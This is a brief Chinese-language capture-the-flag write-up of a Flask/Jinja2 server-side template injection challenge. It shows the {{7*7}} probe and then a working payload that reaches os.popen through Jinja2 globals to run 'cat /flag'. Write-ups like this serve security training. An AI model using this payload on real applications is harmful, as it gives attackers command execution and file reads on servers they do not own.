XJ-Flask-SSTI

题目信息

采用了Jinja2的Flask服务器,打开页面显示Hello guest

解题思路

直接传参name={{7*7}} 测试了可以使用SSTI

然后通过HackBar实现SSTI的负载

查看了本地目录有什么文件

然后列出系统根目录下的文件

发现flag 直接执行 cat /flag

{{self.__init__.__globals__.__builtins__['__import__']('os').popen('cat /flag').read()}}

目录